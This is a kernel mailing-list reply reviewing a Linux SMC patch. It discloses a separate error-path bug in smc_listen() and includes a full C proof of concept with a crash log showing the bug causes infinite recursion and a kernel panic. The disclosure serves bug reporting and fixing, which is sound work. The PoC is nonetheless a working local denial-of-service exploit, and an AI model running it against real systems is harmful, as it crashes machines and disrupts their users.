Re: [PATCH net v2] net/smc: avoid recursive sk_callback_lock in listen data_ready

From: XIAO WU

Date: Tue Jun 23 2026 - 06:39:16 EST


Hi Runyu,

Thanks for this patch.

> diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
> index 6421c2e1c84d..1af4e3c333ff 100644
> --- a/net/smc/af_smc.c
> +++ b/net/smc/af_smc.c
> @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
>  {
>      struct smc_sock *lsmc;
>
> +    if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
> +        return;
> +
>      read_lock_bh(&listen_clcsock->sk_callback_lock);
>      lsmc = smc_clcsock_user_data(listen_clcsock);

The TCP_LISTEN check before taking sk_callback_lock looks correct and
mirrors the same pattern from nvmet TCP.

Sashiko AI review also looked at this patch and flagged a separate
pre-existing issue nearby — the error path in smc_listen() does not
restore icsk_af_ops when kernel_listen() fails:

https://sashiko.dev/#/patchset/20260617152855.1039151-1-runyu.xiao@xxxxxxxxxx

The relevant code in smc_listen() (net/smc/af_smc.c, lines ~2687-2704):

        smc->ori_af_ops = inet_csk(smc->clcsock->sk)->icsk_af_ops;

        smc->af_ops = *smc->ori_af_ops;
        smc->af_ops.syn_recv_sock = smc_tcp_syn_recv_sock;

        inet_csk(smc->clcsock->sk)->icsk_af_ops = &smc->af_ops;

        if (smc->limit_smc_hs)
                tcp_sk(smc->clcsock->sk)->smc_hs_congested = smc_hs_congested;

        rc = kernel_listen(smc->clcsock, backlog);
        if (rc) {
write_lock_bh(&smc->clcsock->sk->sk_callback_lock);
smc_clcsock_restore_cb(&smc->clcsock->sk->sk_data_ready,
 &smc->clcsk_data_ready);
                rcu_assign_sk_user_data(smc->clcsock->sk, NULL);
write_unlock_bh(&smc->clcsock->sk->sk_callback_lock);
                goto out;
        }

The error path restores sk_data_ready and sk_user_data but leaves
icsk_af_ops pointing to &smc->af_ops (whose syn_recv_sock is already
set to smc_tcp_syn_recv_sock).  I verified this in a QEMU VM and can
confirm it triggers a real kernel stack overflow.

=== Reproduction ===

Kernel: 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
Config: ci-qemu-upstream.config (KASAN=y, CONFIG_SMC=y, DEBUG_LIST=y)
QEMU: qemu-system-x86_64 -m 2G -smp 2

Trigger sequence:
  1. SMC socket A: setsockopt(SO_REUSEADDR), bind to port P
     → clcsock gets SO_REUSEADDR via smc_bind() copy
  2. TCP socket C: setsockopt(SO_REUSEADDR), bind + listen on port P
     → Neither socket is in TCP_LISTEN at bind time → bind OK
     → C enters TCP_LISTEN after its listen()
  3. listen(A) on SMC → kernel_listen() fails with EADDRINUSE
     → icsk_af_ops NOT restored → clcsock points to wrapper
  4. Close TCP C (free port), listen(A) again → succeeds
     → ori_af_ops now points to wrapper with syn_recv_sock = smc_tcp_syn_recv_sock
  5. TCP connect() to port P → smc_tcp_syn_recv_sock calls itself
     → infinite recursion → IRQ stack guard page hit → kernel panic

=== Full PoC ===

Compile with: gcc -o poc poc.c -static

// PoC: Stack overflow via corrupted icsk_af_ops in smc_listen error path
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#ifndef PF_SMC
#define PF_SMC 43
#endif
#ifndef SMCPROTO_SMC
#define SMCPROTO_SMC 0
#endif

/* Enable SO_REUSEADDR on fd. Returns 0 on success, -1 with errno set. */
static int set_reuseaddr(int fd)
{
    int val = 1;

    return setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val));
}

/* Fill *addr with an AF_INET address; host_addr and port are host order. */
static void fill_inet_addr(struct sockaddr_in *addr, unsigned long host_addr,
                           int port)
{
    memset(addr, 0, sizeof(*addr));
    addr->sin_family = AF_INET;
    addr->sin_addr.s_addr = htonl(host_addr);
    addr->sin_port = htons(port);
}

/*
 * PoC driver for the smc_listen() error-path issue described in this report.
 *
 * Sequence:
 *   1. bind an SMC socket (with SO_REUSEADDR) to an ephemeral port,
 *   2. bind + listen a plain TCP socket on the same port,
 *   3. listen() on the SMC socket, which is expected to fail,
 *   4. close the TCP listener,
 *   5. listen() on the SMC socket again (retried once after a delay),
 *   6. connect to the port from a forked child.
 *
 * Returns 0 once the full sequence has been driven, 1 if any setup step
 * fails or if the first SMC listen() unexpectedly succeeds.
 */
int main(void)
{
    int smc_a, tcp_c, client;
    struct sockaddr_in addr;
    pid_t child;
    int ret;
    socklen_t len;
    int port;

    printf("=== SMC listen error path -> stack overflow PoC ===\n\n");

    /* Step 1: SMC socket A with SO_REUSEADDR, bind to any free port */
    printf("[1] Create SMC socket A with SO_REUSEADDR\n");
    smc_a = socket(PF_SMC, SOCK_STREAM, 0);
    if (smc_a < 0) { perror("smc socket"); return 1; }
    /* Without SO_REUSEADDR the later bind of TCP C cannot share the port. */
    if (set_reuseaddr(smc_a) < 0) {
        perror("setsockopt smc_a"); close(smc_a); return 1;
    }

    fill_inet_addr(&addr, INADDR_ANY, 0);
    if (bind(smc_a, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("bind smc_a"); close(smc_a); return 1;
    }
    /* Port 0 was requested above; read back the port actually assigned. */
    len = sizeof(addr);
    if (getsockname(smc_a, (struct sockaddr *)&addr, &len) < 0) {
        perror("getsockname"); close(smc_a); return 1;
    }
    port = ntohs(addr.sin_port);
    printf("  SMC A bound to port %d\n", port);

    /* Step 2: TCP socket C with SO_REUSEADDR, bind+listen on same port */
    printf("[2] TCP C with SO_REUSEADDR, bind+listen on port %d\n", port);
    tcp_c = socket(AF_INET, SOCK_STREAM, 0);
    if (tcp_c < 0) { perror("tcp socket"); close(smc_a); return 1; }
    if (set_reuseaddr(tcp_c) < 0) {
        perror("setsockopt tcp_c"); close(tcp_c); close(smc_a); return 1;
    }
    fill_inet_addr(&addr, INADDR_ANY, port);
    if (bind(tcp_c, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("bind tcp_c"); close(tcp_c); close(smc_a); return 1;
    }
    if (listen(tcp_c, 5) < 0) {
        perror("listen tcp_c"); close(tcp_c); close(smc_a); return 1;
    }
    printf("  TCP C listening on port %d\n", port);

    /* Step 3: listen(A) should FAIL → icsk_af_ops NOT restored */
    printf("[3] listen(SMC A) — expect failure... ");
    fflush(stdout);
    ret = listen(smc_a, 5);
    if (ret == 0) {
        printf("succeeded! Unexpected.\n");
        close(tcp_c); close(smc_a);
        return 1;
    }
    printf("failed: %s\n", strerror(errno));

    /* Step 4: Close TCP C to free the port */
    printf("[4] Close TCP C to free port %d\n", port);
    close(tcp_c);
    sleep(1);

    /* Step 5: listen(A) again → succeeds but ori_af_ops is self-referential */
    printf("[5] listen(SMC A) again... ");
    fflush(stdout);
    ret = listen(smc_a, 5);
    if (ret < 0) {
        /* Give the port a little longer to be released, then retry once. */
        printf("failed: %s, retrying...\n", strerror(errno));
        sleep(2);
        ret = listen(smc_a, 5);
    }
    if (ret < 0) {
        perror("retry"); close(smc_a); return 1;
    }
    printf("succeeded! ori_af_ops->syn_recv_sock == smc_tcp_syn_recv_sock\n");

    /* Step 6: TCP connect → smc_tcp_syn_recv_sock recursion → STACK OVERFLOW */
    printf("[6] TCP connect → triggers infinite recursion...\n");
    fflush(stdout);

    child = fork();
    if (child < 0) {
        /* Never pass pid -1 on to waitpid()/kill() below. */
        perror("fork"); close(smc_a); return 1;
    }
    if (child == 0) {
        /* Child: _exit() so the parent's stdio state is never re-flushed. */
        client = socket(AF_INET, SOCK_STREAM, 0);
        if (client < 0) _exit(1);
        fill_inet_addr(&addr, INADDR_LOOPBACK, port);
        if (connect(client, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
            perror("connect");
            _exit(1);
        }
        sleep(3);
        close(client);
        _exit(0);
    }

    printf("Waiting for crash...\n");
    sleep(5);
    /* WNOHANG: a return of 0 means the child exists but has not exited. */
    if (waitpid(child, NULL, WNOHANG) == 0) {
        printf("Child still alive — check dmesg\n");
        kill(child, SIGKILL);
        waitpid(child, NULL, 0);
    }
    close(smc_a);
    return 0;
}

=== Crash Log ===

Linux syzkaller 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
(CONFIG_KASAN=y, CONFIG_SMC=y, CONFIG_DEBUG_LIST=y)

[ 1453.562682][    C0] BUG: IRQ stack guard page was hit at ffffc8ffffffff98 (stack is ffffc90000000000..ffffc90000008000)
[ 1453.562712][    C0] Oops: stack guard page: 0000 [#1] SMP KASAN NOPTI
[ 1453.562733][    C0] CPU: 0 UID: 0 PID: 10840 Comm: poc Not tainted 7.1.0-rc7-gfa471042f07a #1 PREEMPT(full)
[ 1453.562756][    C0] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 1453.562767][    C0] RIP: 0010:__lock_acquire+0x417/0x2730
[ 1453.562965][    C0] Call Trace:
[ 1453.562970][    C0]  <IRQ>
[ 1453.562980][    C0]  lock_acquire+0x1ae/0x360
[ 1453.562995][    C0]  ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563031][    C0]  smc_tcp_syn_recv_sock+0xbf/0xb10
[ 1453.563051][    C0]  ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563073][    C0]  ? __pfx_smc_tcp_syn_recv_sock+0x10/0x10
[ 1453.563114][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563158][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563200][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563244][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
                        [... 15+ recursive frames ...]
[ 1453.564373][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.564413][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.577027][    C0] RIP: 0033:0x423574
[ 1453.577319][    C0] Kernel panic - not syncing: Fatal exception in interrupt

The infinite recursion is visible in the repeated
smc_tcp_syn_recv_sock+0x435/0xb10 frames — each invocation calls
ori_af_ops->syn_recv_sock(), which now points back to
smc_tcp_syn_recv_sock() itself, pushing a new frame until the IRQ
stack guard page is hit.

Thanks,
Xiao